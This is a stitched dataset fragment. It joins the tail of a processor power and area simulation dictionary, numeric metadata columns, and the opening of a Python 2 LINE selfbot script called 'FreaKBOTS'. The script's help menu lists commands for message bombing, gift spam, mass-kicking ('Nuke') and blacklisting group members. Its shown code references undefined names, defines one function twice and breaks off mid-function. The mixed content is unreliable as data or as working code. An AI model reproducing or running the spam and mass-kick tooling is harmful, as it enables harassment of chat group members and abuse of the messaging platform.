'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.16891,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.266469,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.329396,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.68681,
'Instruction Fetch Unit/Runtime Dynamic': 0.713099,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0176904,
'L2/Runtime Dynamic': 0.00582802,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.82544,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.73116,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.116091,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.116091,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.37365,
'Load Store Unit/Runtime Dynamic': 2.41977,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.28626,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.57252,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.101595,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.101837,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.38356,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0437524,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.714191,
'Memory Management Unit/Runtime Dynamic': 0.145589,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.9331,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.000140806,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0146746,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.171728,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.186543,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.96182,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0829041,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.267805,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.585579,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.13007,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.209799,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.105899,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.445769,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0589843,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.89094,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.110629,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00545574,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0648838,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0403485,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.175512,
'Execution Unit/Register Files/Runtime Dynamic': 0.0458043,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.157423,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.360984,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.52574,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 8.27178e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 8.27178e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 7.15674e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 2.74425e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00057961,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000816613,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00081023,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0387881,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.46725,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0781678,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.131742,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.80551,
'Instruction Fetch Unit/Runtime Dynamic': 0.250324,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0998419,
'L2/Runtime Dynamic': 0.0610905,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.11796,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.570676,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0284973,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0284973,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.25253,
'Load Store Unit/Runtime Dynamic': 0.739712,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0702696,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.140539,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0249389,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.02643,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.153405,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0128397,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.352354,
'Memory Management Unit/Runtime Dynamic': 0.0392696,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.9906,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.291013,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00940999,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0592033,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.359626,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.97576,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.3747027051529725,
'Runtime Dynamic': 5.3747027051529725,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.215643,
'Runtime Dynamic': 0.150799,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.3665,
'Peak Power': 113.479,
'Runtime Dynamic': 18.2931,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 80.1508,
'Total Cores/Runtime Dynamic': 18.1423,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.215643,
'Total L3s/Runtime Dynamic': 0.150799,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.049234
| 124
| 0.68193
| 8,088
| 68,595
| 5.777572
| 0.067137
| 0.123606
| 0.112992
| 0.093475
| 0.940315
| 0.931263
| 0.919365
| 0.888078
| 0.862976
| 0.84271
| 0
| 0.131494
| 0.224375
| 68,595
| 914
| 125
| 75.049234
| 0.746805
| 0
| 0
| 0.642232
| 0
| 0
| 0.657546
| 0.048108
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64c12b40df78806d7534678705359240bd968d29
| 263,124
|
py
|
Python
|
FreaKBOTS/FreaKBOTS.py
|
faizarmedi/freakbot
|
bfe5fa54e10312a5eb8f94f2d7c30c4490810dda
|
[
"Unlicense"
] | 1
|
2021-04-03T13:28:25.000Z
|
2021-04-03T13:28:25.000Z
|
FreaKBOTS/FreaKBOTS.py
|
faizarmedi/freakbot
|
bfe5fa54e10312a5eb8f94f2d7c30c4490810dda
|
[
"Unlicense"
] | null | null | null |
FreaKBOTS/FreaKBOTS.py
|
faizarmedi/freakbot
|
bfe5fa54e10312a5eb8f94f2d7c30c4490810dda
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
#from imgurpython import ImgurClient
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, tempfile, glob, shutil, unicodedata, goslate
# Log in to LINE via on-screen QR code and block until login completes;
# every handler below depends on this single client object.
cl = LINETCR.LINE()
cl.login(qr=True)
cl.loginResult()
print "SELFBOT FreaKBOTS\nSUCCES LOGIN\nSELAMAT MENGGUNAKANYA KAWAN"
# Python 2 idiom: force the process-wide default string encoding to UTF-8
# so the emoji/Indonesian text used throughout does not raise
# UnicodeDecodeError on implicit str<->unicode conversions.
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage="""KEYWORD LIST
✰ Me
✰ Add
✰ Cn "text"
✰ Clockname "text"
✰ TL:"text"
✰ Ban:"mid"
✰ Unban:"mid"
✰ Bl:on
✰ Unbl:on
✰ Mcheck
✰ Mybio:
✰ Mybots
✰ Mymid
✰ Mygroups
✰ Group id
✰ Message set:"text"
✰ Message confirm
✰ Msg add-"text"
✰ Com set:"text"
✰ Comment
✰ Comban/del/cek
✰ Help set:"text"
✰ Change
✰ Gn "text"
✰ Clink/Curl
✰ Kick:"mid"
✰ Invite:"mid"
✰ Creator
✰ Contact
✰ Gcancel:"jumlah"
✰ Gcancelall
✰ Ginfo
✰ Check
✰ Cctv
✰ Glink
✰ Spam on/off
✰ Gurl
✰ Clink
✰ Blocklist
✰ Banlist
✰ Update
✰ Creator
✰ Mypict
✰ Ban "@"
✰ Unban "@"
✰ Sc @
✰ Nuke
✰ Backup
✰ Tagall
✰ Bc "text"
✰ Say "text"
✰ Bom "text"
✰ Kick@mbl
✰ Audio "text"
✰ Reinvite
✰ Clearban
✰ Clear
✰ jointicket
✰ Youtube
✰ Copy @
✰ Backup @
✰ Getcover @
✰ Getbio @
✰ Getinfo @
✰ Gimage
✰ Lirik "text"
✰ pict @
✰ Translate️
✰ Wc️
✰ Spam @
✰ Spam gift️
✰ Gift @
✰ Ig "name"
✰ Sikat "@"
✰ Clear
✰ Ban:on/Unbl:on
✰ Contact:on/off
✰ Add:on/off
✰ Join:on/off
✰ Leave:on/off
✰ Share:on/off
✰ Com:on/off
✰ Clock:on/off
SETTING GROUP
★ Pro:on/off
★ Prolink:on/off
★ Proinvite:on/off
★ Procancel:on/off
"""
helo="""SILAHKAN GUNAKAN BOT NYA .JIKA KAMU MAU TAMBAHIN ATAU EDIT LAGI SCRIPT NYA SILAHKN
TAPI TOLONG HARGAI SAYA UNTUK TIDAK MERUBAH LEBEL FreaKBOTS DAN AUTO ADD ATAU AUTO LIKE TERIMAKASIH :D"""
# Roster of live bot accounts. Only `cl` is active; the ki/ki2/... extra
# accounts referenced elsewhere in this file are commented out here, so
# handlers that use kimid/ki.sendMessage will raise NameError if reached.
KAC=[cl]
mid = cl.getProfile().mid
#kimid = ki.getProfile().mid
#ki2mid = ki2.getProfile().mid
#ki3mid = ki3.getProfile().mid
#ki4mid = ki4.getProfile().mid
#ki5mid = ki5.getProfile().mid
#ki6mid = ki6.getProfile().mid
Bots=[mid]
# NOTE(review): placeholder string — presumably meant to hold the owner's
# mid; confirm before relying on admin checks.
admsa = "mid kamu"
# Global feature-flag / state table read and mutated by the event handlers
# (auto-join, blacklists, protection toggles, canned messages, ...).
wait = {
'contact':False,
'autoJoin':False,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"""FreaK-FreaK-FreaK-FreaK
""",
"commentOn":False,
"likeOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"atjointicket":True,
}
# Read-receipt tracking state, keyed by chat id.
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
# Mimic/copy-profile feature state.
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
# NOTE(review): the first assignment is immediately overwritten — setTime
# ends up aliasing wait2['setTime'].
setTime = {}
setTime = wait2['setTime']
# Snapshot the current profile so it can be restored later (backup).
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
    """Return True if *string* exactly matches one of *commands*.

    Fix: the original looped over a table of command prefixes (``tex``)
    but never used the loop variable, so it merely repeated the same
    membership test once per prefix. The dead outer loop is removed;
    the observable result (exact-match membership) is unchanged.
    """
    for command in commands:
        if string == command:
            return True
    return False
def upload_tempimage(client):
    """Upload a temporary image through *client* and return the result.

    NOTE(review): depends on module-level names ``album`` and
    ``image_path`` that are not defined anywhere in this file — this
    function raises NameError unless they are injected by the caller's
    environment; confirm before use.
    """
    upload_config = {
        'album': album,
        'name': 'bot auto upload',
        'title': 'bot auto upload',
        'description': 'bot auto upload'
    }
    print("Uploading image... ")
    uploaded = client.upload_from_path(image_path, config=upload_config, anon=False)
    print("Done")
    print()
    return uploaded
def sendMessage(to, text, contentMetadata={}, contentType=0):
    """Build a Message for *to* and bump the per-target send counter.

    NOTE(review): the constructed message is never actually sent, and
    ``Message``, ``profile`` and ``messageReq`` are free names supplied
    elsewhere — presumably by the surrounding framework; confirm.
    """
    msg = Message()
    msg.to = to
    msg.from_ = profile.mid
    msg.text = text
    msg.contentType = contentType
    msg.contentMetadata = contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
    """Duplicate of sendMessage above — builds a Message and increments
    the per-target counter in ``messageReq`` without sending anything.

    NOTE(review): ``Message``, ``profile`` and ``messageReq`` are free
    names not defined in this chunk; confirm they exist at runtime.
    """
    msg = Message()
    msg.to, msg.text = to, text
    msg.from_ = profile.mid
